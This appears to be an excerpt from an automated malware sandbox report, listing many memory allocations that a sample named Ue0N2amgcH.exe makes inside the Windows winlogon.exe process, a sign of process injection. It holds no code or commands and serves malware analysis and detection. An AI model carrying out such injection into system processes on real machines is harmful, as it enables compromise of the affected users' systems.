Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF92000 protect: page read and writeJump to behavior
